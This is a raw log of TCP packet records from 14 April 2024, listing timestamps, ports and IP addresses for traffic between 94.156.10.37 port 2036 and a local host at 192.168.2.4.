Apr 14, 2024 08:45:13.425194025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.425246000 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.429572105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.436400890 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.437844992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.437964916 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.439178944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635070086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635097980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635114908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635133982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635164022 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635174036 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635190010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635195017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635226965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635242939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635251999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635301113 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635471106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635489941 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635505915 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635521889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635539055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635554075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635557890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635575056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635581017 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635592937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635611057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635617018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635628939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635643005 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635646105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635663033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635679007 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635679007 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635698080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635715008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635721922 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635732889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635746002 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635750055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635766983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635782957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635795116 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635799885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635817051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635832071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635842085 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635849953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635870934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635873079 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635891914 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635894060 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635910034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635936975 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635960102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635967016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.635978937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.635997057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636014938 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636029959 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636032104 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636050940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636059046 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636068106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636084080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636101007 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636109114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636118889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636136055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636137962 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636153936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636168957 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636173010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636190891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636199951 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636208057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636235952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636253119 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636261940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636270046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636287928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636298895 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636305094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.636322975 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.636364937 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645693064 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645735979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645752907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645770073 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645787001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645793915 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645806074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645811081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645826101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645844936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645855904 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645865917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645883083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645900965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645909071 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645920038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645936966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645946026 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645953894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645970106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645982027 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.645987988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.645992041 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646007061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646023989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646039963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646055937 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646058083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646075964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646091938 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646100044 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646111012 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646126032 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646128893 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646147013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646153927 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646173954 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646182060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646199942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646217108 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646224022 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646234989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646251917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.646261930 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.646291971 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.650888920 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.650907993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.650955915 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651266098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651283979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651300907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651318073 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651325941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651335955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651354074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651364088 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651396036 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651462078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651479006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651535988 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651653051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651670933 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651714087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651895046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651912928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.651957989 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.651983023 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652002096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652048111 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652091980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652110100 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652151108 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652309895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652328968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652348042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652364016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652373075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652409077 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652452946 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652471066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652510881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652556896 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652575016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652616024 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652666092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652684927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652729034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652757883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652776003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652817011 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.652956009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.652976036 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653021097 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653050900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653070927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653111935 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653178930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653198004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653239965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653269053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653289080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653327942 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653373957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653460979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653479099 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653496027 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653505087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653513908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653531075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653548002 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653549910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653573990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653645039 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653662920 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653678894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653696060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653753996 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653784037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653798103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653815031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653831959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653848886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653851986 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653867006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653883934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653883934 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653903008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653918982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653925896 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.653937101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653953075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653969049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653985977 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.653987885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654005051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654021025 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654021978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654040098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654047966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654057026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654073954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654090881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654103994 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654109001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654126883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654144049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654150963 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654161930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654179096 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654180050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654197931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654212952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654216051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654232025 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654234886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654254913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654272079 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654289007 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.654290915 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654313087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.654345036 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.655966997 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.662161112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.662179947 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.662237883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.663537979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.716511965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861159086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861222029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861260891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861296892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861295938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861337900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861349106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861378908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861417055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861445904 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861455917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861520052 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861618042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861656904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861694098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861713886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.861732960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.861793041 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862133980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862175941 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862212896 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862231016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862253904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862289906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862304926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862329960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862369061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862382889 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862406969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862443924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862453938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862481117 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862524033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862543106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862560034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862581015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862617970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862653971 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862667084 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862692118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862716913 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862730026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862740040 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862770081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862807035 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862823963 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862844944 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862880945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862895966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862920046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862956047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.862970114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.862993956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863030910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863045931 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863069057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863109112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863118887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863147974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863184929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863223076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863223076 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863259077 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863280058 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863306999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863318920 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863352060 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863357067 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863394976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.863409042 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.863432884 CEST	2036	49736	94.156.10.37	192.168.2.4
